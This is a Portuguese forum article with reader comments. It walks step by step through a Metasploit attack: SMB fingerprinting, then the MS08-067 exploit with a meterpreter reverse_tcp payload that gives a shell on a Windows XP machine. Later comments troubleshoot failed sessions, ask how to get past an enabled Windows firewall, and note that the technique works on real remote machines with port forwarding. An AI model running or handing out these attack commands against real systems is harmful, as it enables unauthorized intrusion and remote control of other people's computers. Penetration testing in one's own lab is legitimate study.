Salve salve galera do VOL! Aqui vai mais um artigo falando sobre o framework Metasploit. Irei demonstrar algumas técnicas simples/básicas de scanning e fingerprint usando o Metasploit e em seguida exploraremos uma máquina MS para obtermos uma shell. Let`s go???
Quando executamos o comando exploit, será realizado um "fingerprint" para a detecção do sistema operacional e verificar se o mesmo consta em sua lista de SOs vulneráveis.
Como vimos através do script do nmap que nosso alvo é vulnerável, nós podemos realizar o processo de fingerprint e passar as especificações corretas para o msf, assim nosso exploit não precisará realizar esta etapa, gerando possibilidades menores de erros.
Certo, mas como? Vamos utilizar um módulo auxiliar presente no Metasploit para descobrir a versão do SO, o idioma, nome da máquina e o domínio.
Executaremos os seguintes comandos no console do msf:
use auxiliary/scanner/smb/smb_version#Falamos que queremos utilizar o scanner smb_version. set RHOSTS 192.168.0.186 #Aqui eu setei um único host (192.168.0.186), mas poderia especificar um range, exemplo, 192.168.0.0/24. run#Comando para executar nosso scanner.
Agora já sabemos a versão certa do SO e o idioma, com isso especificaremos em nosso exploit usando a opção set TARGET.
use exploit/windows/smb/ms08_067_netapi#Aqui falamos que queremos usar o exploit ms08_067_netapi set RHOST 192.168.0.186#Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM com Windows XP SP2 set PAYLOAD windows/meterpreter/reverse_tcp#Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST. set LHOST 192.168.0.170#Aqui setamos nosso host local, que no caso é o endereço IP da VM com Backtrack 4. set TARGET 31#Aqui eu digo que o alvo usa exploit#E finalmente executamos nosso exploit.
Na imagem abaixo,com o comando show targets são listados todos os S.O.s vulneráveis a este exploit (ms08_067).
Veja abaixo que iremos utilizar a opção 31.
Veja o ataque agora.
Veja que não foi realizada a etapa de fingerprint com o alvo, pois "falamos" para o exploit o S.O. que ele encontrará em seu destino.
Ok! Finish! The end! Heheheh
Ah!
É isso galera, intrusão simples, sendo recomendado para quem ainda está começando com o Metasploit. Como continuação, poderão seguir o outro artigo que escrevi sobre o Metasploit:
[7] Comentário enviado por paulorvojr em 27/03/2010 - 11:05h
belo artigo, parabens
a mod distro backtrack tem centenas de exploits prontinhos pra serem usados rsrsrsrs
o chato disso é que uns kiddie´s vão logo pensar que é hacker e teu artigo vai parar naquelas páginas feitas em html com uma caveira digital em GIF, invadindo o XP!! rsrsrs
pessoal é fogo...rsrsrs
adoro o backtrack, uso mais pra testar vulnerabilidade de servers e clients.
[8] Comentário enviado por removido em 27/03/2010 - 13:33h
Li recentemente na INFO que os usuários de software livre são justamente os que mais sofrem de fraudes e invasões em seus sistemas, justamente por pensarem que estão imunes à qualquer ameaça digital. Entretanto, não há sistema para imune a burrice humana : D
A melhor maneira de nos defendermos de um atual ataque é sabendo como eles funcionam de antemão. Alguns usuários tradicionais talvez achem um absurdo ensinar técnicas de invasão, mas a verdade é que somente aprendendo-as é possível defender-se de forma mais eficiente.
[9] Comentário enviado por lestatwa em 29/03/2010 - 13:15h
Parabéns pelo artigo!
A uns anos atrás quando eu iniciava na área senti falta de um material bem explicado.
O problema da informação, é que... bem... tem gente que "com poder demais" nas mãos, faz cagada!
[10] Comentário enviado por marcus.andrade8 em 25/04/2010 - 07:46h
Funcionou blz com o xpsp3 (lembrando que para esse S.O. a falha é outra, porém da mesma linha). Fiz um vídeo mostrando o procedimento. Para proteger o sistema, basta aplicar as atualizações de segurança, ou no caso dos meus testes, habilitar o firewall do Windows foi tudo o que precisei. Abraços! http://www.youtube.com/watch?v=9ydB1dApenU
[11] Comentário enviado por peregrino em 02/07/2010 - 14:31h
Boa Tarde otimo tutorial, fiz uns testes e realmente funciona so gostaria de saber e quando o firewall do windows xp esta abilitado o que eu poderia fazer para ter sucesso
[12] Comentário enviado por renato_pacheco em 17/01/2011 - 14:31h
Poxa... estou tentando testar a ferramenta, mas quando eu encontro uma máquina vulnerável, eu executo o exploit direitim, mas num cria a sessão (sessions). O q está dando d errado? A msg é essa:
[*] Exploit completed, but no sessions was created.
Ah! Quando listo as sessões, mostra (sessions -l):
[13] Comentário enviado por roberto_espreto em 20/01/2011 - 18:04h
@renato_pacheco
Verifique o firewall do windows se está ativo ou não! Está executando contra um win SP2 ou SP3? Está na mesma range de IP? Passe mais detalhes que conseguirei de ajudar!
[15] Comentário enviado por mikeitaly em 29/09/2011 - 16:17h
faço essa pergunta a todos que usam backtrack..
estou usando a versao 5 R1.. es estou fazendo testes na minha rede interna..
comigo o resultado ja foi diferente..
...
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
...
Reparem ele diz que "regsvc DoS" , " SMBv2 DoS " , " MS06-025 " , " MS07-029 " nao foram checados se tinham falhas ou naum, porque no script que foi usado naum tinha o parametro
" --script-args=unsafe=1 " ..
como eu faço pra adicionar esse parametro e onde fica o script para eu adicionar esse parametro?
[19] Comentário enviado por meetgyn em 15/02/2012 - 01:48h
Cara curti muito seu trabalho porem estou com uma dificuldade igual a do colega acima:
Primeiro quero saber se esta tecnica ai funciona remotamente. Pois fiz tudo via vmware e deu certo, mais remoto não funcionou.
segundo Instalei o metasploit em meu mandriva powerpack ta tudo certinho mais quando vou executar o procedimento ele retorna o erro "Exploit completed, but no session created"
teria com dar uma ajuda?
[21] Comentário enviado por roberto_espreto em 27/03/2012 - 07:31h
Este tutorial foi criado baseando-se em máquinas virtuais, porém, também funciona em máquinas reais e remotas, basta apenas atentar-se a regras de encaminhamento de portas (Port Forwarding) entre outros por menores. Adapte-se! :D
[22] Comentário enviado por JonatasLaet em 28/12/2012 - 20:13h
Usei o VMware pras duas. Ambas com as configurações mencionadas. Mas o resultado não foi o esperado. Abaixo coloquei o link da PrintScreen do resultado. Ajude-me quem puder.
[23] Comentário enviado por ftalinux em 31/03/2013 - 14:47h
cara esse tutorial seu fala pro c!!!
vc que informa para os usuarios que voce sabe utilizar essa ferramenta neh!!!
pq isso nao foi um tutorial !!
vc e robo ????
esses topicos ae acaba com a comunidade d vcs,inrriquece a pagina de porcaria !!!!!! vivaolinux ta meio largado,,,,,,,FRACO FRACO FRACO
[24] Comentário enviado por gseis em 02/03/2016 - 02:11h
Sem querer ser daqueles iniciantes Linux enjoados/chatos ou aquela molecada de 10 anos invadindo orkut, mas se possível gostaria de obter mais info sobre o tema, também gostaria de aprender a explorar vulnerabilidade de sites, pra ser mais exato gostaria de entender e conhecer "conteúdos crackers" (Mais polêmicos que mamilos).
Sou novo no Linux (Uso Mint há uma semana), entendo nada ou quase nada de rede e vulnerabilidade. Se alguém souber de alguns links para iniciar os estudos sobre os temas citados ficarei bastante agradecido.
[25] Comentário enviado por torver em 28/10/2016 - 00:27h
Eu to com problema no script -v --script=smb-check-vulns , tentei varias coisas aqui que vi em outros foruns (por exemplo especificar a vulnerabilidade) contudo o erro continua, alguem ja passou por isso?